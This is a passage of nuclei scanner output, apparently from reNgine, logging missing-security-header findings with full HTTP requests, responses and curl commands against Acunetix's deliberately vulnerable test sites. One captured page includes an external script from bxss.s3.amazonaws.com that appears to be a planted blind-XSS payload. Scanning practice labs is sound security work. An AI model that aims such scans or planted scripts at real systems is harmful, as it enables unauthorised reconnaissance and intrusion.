can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:01.573856907Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:01.573860221Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:01.573900864Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n 